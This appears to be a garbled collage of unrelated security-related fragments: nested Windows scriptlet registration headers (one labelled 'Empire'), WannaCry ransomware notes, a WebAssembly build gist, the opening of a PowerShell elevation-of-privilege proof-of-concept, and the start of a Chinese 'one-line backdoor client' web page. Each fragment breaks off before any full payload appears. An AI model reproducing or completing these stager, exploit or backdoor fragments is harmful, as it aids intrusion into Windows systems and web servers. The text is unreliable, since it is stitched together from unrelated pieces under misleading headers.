<?XML version="1.0"?>
<scriptlet>
<registration
description="WzVQ"
progid="WzVQ"
version="1.00"
classid="{00001111-0000-0000-0000-0000FEEDACDC}"
>
<script language="JScript">
<?XML version="1.0"?>
<scriptlet>
<registration
description="Empire"
progid="Empire"
version="1.00"
classid="{00001111-0000-0000-0000-0000FEEDACDC}"
>
<!-- USAGE -->

WannaCry|WannaDecrypt0r NSA-Cyberweapon-Powered Ransomware Worm

  • Virus Name: WannaCrypt, WannaCry, WanaCrypt0r, WCrypt, WCRY
  • Vector: All Windows versions before Windows 10 are vulnerable if not patched for MS17-010. It uses EternalBlue (MS17-010) to propagate.

SECURITY BULLETIN AND UPDATES HERE: https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

Malware samples

@msimpson
msimpson / !wasmllvm.md
Last active December 2, 2020 18:29 — forked from yurydelendik/!wasmllvm.md
Using WebAssembly in LLVM on Windows

Forewarning: this can be a bit painful and may not work as expected. I've already had issues with even including stdlib through clang.

Installing Dependencies

GIT

Make sure you have git installed and properly configured before continuing. This is trivial on Windows these days (https://git-scm.com/download/win) but is required to pull down Binaryen and Wabt.

Make sure to add the binary to your PATH variable in Windows.

@mattifestation
mattifestation / Win10IoTCoreEoP.ps1
Created July 24, 2016 05:26
Windows 10 IoT Core (Build 14393) Elevation of Privilege PoC Exploit
#region Win10IoT Audit Code
$CimSession = New-CimSession -ComputerName Win10IoT -Credential Administrator -Authentication Negotiate
Get-CimInstance -ClassName Win32_OperatingSystem -CimSession $CimSession
Get-CimInstance -ClassName Win32_Service -Filter 'Name = "InputService"' -CimSession $CimSession | Format-List *
# Run the service audit function in CimSweep
$ServicePermissions = Get-CSVulnerableServicePermission -CimSession $CimSession
$ServicePermissions | Where-Object { $_.GroupName -eq 'NT AUTHORITY\Authenticated Users' }
# The fact that Authenticated Users can change the service configuration means that
@phoenixg
phoenixg / lanker.backdoor.html
Created September 7, 2013 13:37
lanker one-line backdoor client 3.0
<HTML><HEAD>
<!-- codz by LANKER(QQ:18779569) 2005/1/1-->
<META content="text/html; charset=gb2312" http-equiv=Content-Type>
<META content="MSHTML 5.00.2614.3500" name=GENERATOR>
<style>
<!--
td {font-size:8pt; color: #666666;font-family:Verdana}
INPUT {font-size:9pt;BORDER-RIGHT: #cccccc 1px solid; BORDER-TOP: #cccccc 1px solid; BORDER-LEFT: #cccccc 1px solid; COLOR: #666666; BORDER-BOTTOM: #cccccc 1px solid; BACKGROUND-COLOR: #ffffff}
textarea {font-size:9pt;BORDER-RIGHT: #cccccc 1px solid; BORDER-TOP: #cccccc 1px solid; BORDER-LEFT: #cccccc 1px solid; COLOR: #666666; BORDER-BOTTOM: #cccccc 1px solid; BACKGROUND-COLOR: #ffffff}
select {font-size:9pt;BORDER-RIGHT: #cccccc 1px solid; BORDER-TOP: #cccccc 1px solid; BORDER-LEFT: #cccccc 1px solid; COLOR: #666666; BORDER-BOTTOM: #cccccc 1px solid; BACKGROUND-COLOR: #ffffff}